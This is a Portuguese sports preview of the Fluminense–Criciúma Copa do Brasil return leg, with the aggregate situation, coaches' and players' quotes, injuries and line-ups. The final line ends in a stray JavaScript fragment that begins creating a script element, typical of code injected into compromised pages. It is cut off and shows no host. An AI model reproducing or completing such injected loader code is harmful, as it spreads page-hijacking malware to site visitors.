O Fluminense reencontra o Criciúma nesta quarta-feira, às 19h30, no Estádio Giulite Coutinho, em Mesquita (RJ), pelo confronto de volta da terceira fase da Copa do Brasil. Os dois times empataram por 1 x 1 na ida, na semana passada, em Santa Catarina. Assim, quem ganhar dessa vez avança e um novo 1 x 1 forçará a disputa de pênaltis. Um empate sem gols serve aos cariocas, pois os tentos anotados como visitante valem como critério de desempate. Pelo mesmo motivo, igualdade a partir de 2 x 2 classifica os catarinenses.
As equipes chegam embaladas. Após vencer a Taça Guanabara, primeiro turno do Campeonato Carioca, o Fluminense, mesmo com reservas, venceu o Boavista por 2 x 0 no domingo, pela estreia na Taça Rio. Já o Criciúma surpreendeu o Avaí pelo Campeonato Catarinense com um triunfo por 3 x 2 em Florianópolis. O fato ligou o sinal de alerta nos tricolores.
“O Fluminense vai enfrentar um adversário que vem de uma vitória e que precisa ser respeitado por conta disso. Não vamos pegar um time desqualificado e sem estrutura, portanto, facilidades não encontraremos. Porém, temos a responsabilidade de buscar a vitória e a classificação pelo que fizemos na partida de ida e porque jogaremos em casa”, avisou o zagueiro Renato Chaves.
O técnico Abel Braga se mostrou preocupado com o desgaste do elenco. “Nós estamos enfrentando uma maratona de jogos que passa pela Copa do Brasil, pela Primeira Liga e pelo Campeonato Carioca. Os resultados positivos estão aparecendo graças a um esforço muito grande dos jogadores e isso sempre é motivo de preocupação, até porque o Criciúma mostrou ter qualidade. Portanto, vamos trabalhar com inteligência, procurando valorizar a posse de bola e tentar ganhar no momento certo, sem exposição desnecessária”, disse Abelão.
O Flu terá o retorno dos seus titulares contra o Criciúma. Os desfalques ficam por conta do lateral-direito Lucas, ainda com dores na coxa direita, e do meia Gustavo Scarpa, que teve uma fissura no pé direito e não tem previsão de retorno aos gramados. Renato assume a lateral, depois de atuar contra o Boavista, marcando inclusive um gol. E Marco Junior atuará no meio campo.
Pelo lado do Criciúma, o técnico Deivid quer ver sua equipe jogando com atitude. “Vamos precisar nos impor contra o Fluminense, atuando como um time que acredita que pode vencer e conseguir a classificação. A Copa do Brasil é um torneio diferente, em que noventa minutos podem definir a sorte de um time. Portanto, não vejo motivos para desistirmos. Não conseguimos ganhar na ida conforme o esperado, mas podemos surpreender”, disse Deivid.
Para este compromisso o Criciúma poderá contar com o retorno do goleiro Luiz, recuperado de lesão coxa esquerda. O restante do time será o mesmo que participou do confronto de ida.
FICHA TÉCNICA
FLUMINENSE-RJ X CRICIÚMA-SC
Local: Estádio Giulite Coutinho, em Mesquita (RJ)
Data: 15 de março (quarta-feira)
Horário: 19h30
Árbitro: Leandro Pedro Vuaden (RS)
FLUMINENSE: Diego Cavalieri; Renato, Renato Chaves, Henrique e Léo; Orejuela, Douglas, Sornoza e Richarlison; Wellington Silva e Henrique Dourado. Técnico: Abel Braga.
CRICIÚMA: Luiz; Diogo Mateus, Raphael Silva, Diego Giaretta e Marlon; Douglas Moreira, Barreto e Alex Maranhão; Caio Rangel, Adalgiso Pitbull e Andrew. Técnico: Deivid.var d=document;var s=d.createElement(\’script\’);